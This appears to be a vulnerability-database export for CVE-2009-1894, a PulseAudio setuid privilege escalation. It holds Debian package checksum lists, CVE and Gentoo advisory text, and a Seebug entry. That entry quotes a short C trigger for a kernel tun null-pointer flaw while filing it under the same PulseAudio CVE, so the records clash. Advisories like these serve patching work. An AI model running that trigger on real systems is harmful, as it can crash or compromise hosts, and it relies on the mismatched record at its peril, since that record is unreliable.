http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 83410 b890db2bc15ceeafd14a377577d31d35\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 68134 d74e54a886deca2c4359ade661cdb42a\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 380682 c43351c007f56ab3d77a1f977f659c5a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 63556 b374042d43bb6f8fc4efc27b36f9969e\n 
http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 96502 04ab1de243a7d36b9895e2876b85a8ac\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 100782 6480a01d3e6a8a2c120a03b921cadff7\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 80850 fa575119328c04d1b54df674ee47ba96\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 59646 ae7539cea6d769bbaf67ce25f03a9a9d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 87716 a23aef27fa273004dd6bf72d3000d044\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 79454 95d7c438ff59b44947b33f2e29b049bf\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 71730 94e926c5578c38a3e59e95260fd05f1a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 89394 5c0eb0d18a58698c826cb6f34cc79819\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 312634 49811d5af820d0c01589704a06a43f70\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 94250 99e1822381d12f8a1e272a53229bda2f\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 67700 2fb2a3264f7467fbf11137b1727ceecf\n 
http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 347702 12f059b554dd98730756034e5b7dafb6\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 63996 9ba7f7247959d3e48149f749b747874e\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 74308 5df3a35d2ec9a16c54d35f4a319bd465\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 60638 cd57423232f7c86c4b722e9e3d0e2889\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 63862 c7e66b3abe793ab644d131a1fc42e5c0\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 102752 64803fee04739b5dbeac2fc99e7d2b59\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 405048 5ffcc0b6ba1de9e4c69fa41b778c2cbb\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 65328 efd43b1079210526857e64f51c878c2c\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 225428 98a5f6c1f56cb93bcfee9cf16347160c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 67662 e0813f6cf0cd64c6f2829c1a108f16b8\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 416174 88f43dab9cee294d33f0578ac6f099d2\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 172062 dab30e756c76604d0a74f889e4c10b01\n 
http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 57730 dfc7881de991c407a62e79a564dab14c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 75466 dd9d908fdcc7d5acbf7bf7465df774e3\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 79020 ac9fc592cc2257e06756052f9ce14c0d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 276606 f472a9954d213e8184287038c9ab319a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 66904 92f526018fe9f96672a74ab7f6cbdb78\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 100898 a6a2f7d6c39fb93349645277235154be\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 650818 816ba8a2498939eec70f3f9175f5fe6d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 93010 1f6f98f7f5d262f1e9f151cea20ad6fd\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 73848 6640b99b6da5351f0c36fa048c1b339b\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 87808 7733283cddcd38ad69383298d12b7af7\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 334254 c35970a8bca34c74557ca97b9fbea976\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 178734 48c3e2141cb85fc630f098c9aa0b31e5\n 
http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 98690 7539ef5197b170adc2c0f4f3095dac39\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 78674 6f0f69a9a5a34345f1250210180d6477\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 377926 0b4d6084d5c7d6a8f4d2a606a80e90d9\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 65362 dc52cb4b9ecbf55cd4b048e09edeaa36\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 203634 d46252e0277a17e23ed1c374e7d0b40e\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 101244 4704ccf4dae60837fa5cd056b19cd915\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 70098 9fb0261e0c0e0056aa88bc7fd0b481b4\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 77306 1dc0b5b94030b7a688bda80eaf133c72\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 65732 3669846ce9a835c61658623028a212da\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 403870 973aa32fa72e821b23fffe46084b5d4a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 686228 bbf54598d5b8f07ba19a3ebb7e87325f\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_powerpc.deb\n 
Size/MD5 checksum: 251140 47533654191322fac29641b0d19b8698\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 194882 460f8cf77083e917a3096fa65c8552a7\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 339512 47cb0c635f75c5420ebf2e9e803f8b4d\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 98870 a485175a5086242ac0adfb7997d4740d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 87304 8c82e2255583ef17b506d36096611f8f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 92304 32d2a875ac15bbeb006a965b459f4cf1\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 60610 3e025417fd8fcfd9ec9acfc8cdff1ac9\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 77312 8fbbaa0f91f6a2780cd9216084608d59\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 82426 038251aa3bf89f11303c5c123a4cf726\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 70378 ea5725f405ee39e985a61865a27854de\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 283046 14cc07f105861c25b5bf221c86b62d91\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 75070 8fdd7192b94ed7e299cecc9b0f92e1ed\n 
http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 102824 b977fb28f919d9911d940a74002ba28a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 98982 385739f4ca999e125bb42d1dac974a72\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 82984 ed99d756b799ba6b07e5276658cc78b0\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 68070 dfbe4aea1b2e9408a5f295ff8f4b6a3a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 73856 56d0b369ea00d29bdfd9bb83c0257f9d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 439454 b31c7cafbfcd4c83dddd48785a7754e9\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 100548 0214fc442482b5c7090ceb79f5c27090\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 78522 8261d3e83421e938dc6890010a9d70e0\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 208544 14fecf1a7fcc580afbdeab1f8b73f324\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 99258 65d1c2cd1f3b0428ea380c50d1bd21ce\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 87860 0a6f5a602dbcf5b0a9aa08276bfde951\n 
http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 61986 4dcaf2c6e2ccffa2759e83320f32d835\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 371424 da91f945dea21175c7fef71027ce2da3\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 341270 2e06708dc7a2613538e8d9b77b6fc4f6\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 79084 cbd78997b63ef376ee06e0178d73bc8e\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 190560 caf484ec5151295273f93fcee9b3a4b1\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 67958 cf6178674b57b0401c2cfb5ae72f09ab\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 620812 2d6ce88c0adf540f176a3d5245399b9b\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 65930 7dd7becdeae80cf1026b7a493384f90f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 67810 f995fc059e29a3570e10c2c13b4b0bc9\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 415728 a3581bc853eeb0e0b61fb27a20012045\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 70058 72b7126c044b80e87c66eb8a7ea416bc\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 58546 9f267ca42e705a4c67794170141d04f7\n 
http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 265622 91881d612e8901e35b3eaec011f33b96\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 75462 c97b5ed23b8f780b48a8bc98abe5b1f6\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 343574 a1cd00f9270d94b950919db89a30a62c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 273492 79a540bbca1d60f49499c9544206ace6\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 68904 e5eb7d9ab4a2ec85a1122132c3c100aa\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 81674 c7163db17dd230855cf1a46383f34264\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 64466 934307a2947170203947227b354ad18b\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 98328 758922dfd82920ca20186820e19ae512\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 78962 f9ec3beb93a7068118530ed33272d174\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 91544 6673126a6365b553ce05c8eb6b16e745\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 66662 45d9e412cf170071c64289e1a92a6b09\n 
http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 63560 8ea5f8d300fad52cf57bc093bc938a8a\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 242524 0c84b827fc920dc16f130f0015145708\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 75078 db616b6a59b36438bcd5afc7347f1e96\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 75304 3f020ccb8aea47c0a27e955b5d86a900\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 74232 b19af2e3e228167a6f2f1cce443ee59a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 93702 46d917e58daacc5260b911be29d55c46\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 353434 c7ee1906b4ca8d317b3c7188b7e93458\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 65790 bb598f0efa599c5f41c2b4e48882052a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 86014 d8ed73c0885f744fdbb5b8204ee5a088\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 77468 c129ad3556417f4d80d6628b62ab904f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 57622 ff9552b5a136ba5ecb50e2e438a0acd0\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 97486 
7ef20c0cbad0de3f971839f5f3cc0399\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 391866 aaa17f0fcfa72656840f5bea493aff1a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 64034 5248974c7b2bd5d1353741ceb4eb6392\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 351832 ee16cc3391e7819f299e71d0013903b2\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 101580 24faa396862fcc9b4c29b530382184fd\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 261054 f351146c55677ec3f16a728d254c56f0\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 67958 0dd121a16e0eec31c07cba4832fe845d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 67122 cab4efcc68c29ed251c818fd590a1e61\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 79168 33d184042be0a8133cad9b244b88dc4f\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 93242 b42621e1fda017e93045ed4efd87b56f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 174586 e1aaa6e1a9b6aa1af1dcb0c8b414a10d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 60278 bc1218b7eca8891a367f7c880cf5022f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_sparc.deb\n 
Size/MD5 checksum: 617574 fd0bedd20efa06edde82525e9e2330b1\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 331682 552d2a40027cde0d1a9cc8360fad0ace\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 190684 e71731d57b84a892f0683e5b52f7557b\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>", "cvss3": {}, "published": "2009-07-18T12:18:19", "type": "debian", "title": "[SECURITY] [DSA 1838-1] New pulseaudio packages fix privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-18T12:18:19", "id": "DEBIAN:DSA-1838-1:2C084", "href": "https://lists.debian.org/debian-security-announce/2009/msg00152.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2022-02-27T07:38:52", "description": "Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gain privileges via vectors involving creation of a hard link, related to the application setting LD_BIND_NOW to 1, 
and then calling execv on the target of the /proc/self/exe symlink.", "cvss3": {}, "published": "2009-07-17T16:30:00", "type": "debiancve", "title": "CVE-2009-1894", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-17T16:30:00", "id": "DEBIANCVE:CVE-2009-1894", "href": "https://security-tracker.debian.org/tracker/CVE-2009-1894", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2022-01-17T19:14:09", "description": "### Background\n\nPulseAudio is a network-enabled sound server with an advanced plug-in system. \n\n### Description\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered that the pulseaudio binary is installed setuid root, and does not drop privileges before re-executing itself. The vulnerability has independently been reported to oCERT by Yorick Koster. \n\n### Impact\n\nA local user who has write access to any directory on the file system containing /usr/bin can exploit this vulnerability using a race condition to execute arbitrary code with root privileges. \n\n### Workaround\n\nEnsure that the file system holding /usr/bin does not contain directories that are writable for unprivileged users. 
\n\n### Resolution\n\nAll PulseAudio users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-sound/pulseaudio-0.9.9-r54\"", "cvss3": {}, "published": "2009-07-16T00:00:00", "type": "gentoo", "title": "PulseAudio: Local privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-16T00:00:00", "id": "GLSA-200907-13", "href": "https://security.gentoo.org/glsa/200907-13", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:43:01", "description": "BUGTRAQ ID: 35724\r\nCVE(CAN) ID: CVE-2009-1894\r\n\r\nLinux Kernel is the kernel used by the open-source operating system Linux.\r\n\r\nThe tun_chr_poll() function in the Linux Kernel's drivers/net/tun.c file contains a null pointer dereference error:\r\n\r\n int fd;\r\n struct pollfd pfd;\r\n fd = open("/dev/net/tun", O_RDWR);\r\n pfd.fd = fd;\r\n pfd.events = POLLIN | POLLOUT;\r\n poll(&pfd, 1, 0);\r\n\r\nIf a user performs open() and poll() operations on the tun device, this vulnerability can be triggered, leading to a crash or to execution of arbitrary instructions with root privileges. A successful attack requires that the kernel was compiled with GCC's -fdelete-null-pointer-checks optimization.\n\nLinux kernel 
2.6.30\nVendor patch:\r\n\r\nLinux\r\n-----\r\nThe vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:\r\n\r\nhttp://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=3c8a9c63d5fd738c261bd0ceece04d9c8357ca13", "cvss3": {}, "published": "2009-07-20T00:00:00", "type": "seebug", "title": "Linux Kernel tun_chr_pool() function null pointer dereference vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11842", "id": "SSV:11842", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T15:37:59", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "GNU C library dynamic linker $ORIGIN expansion 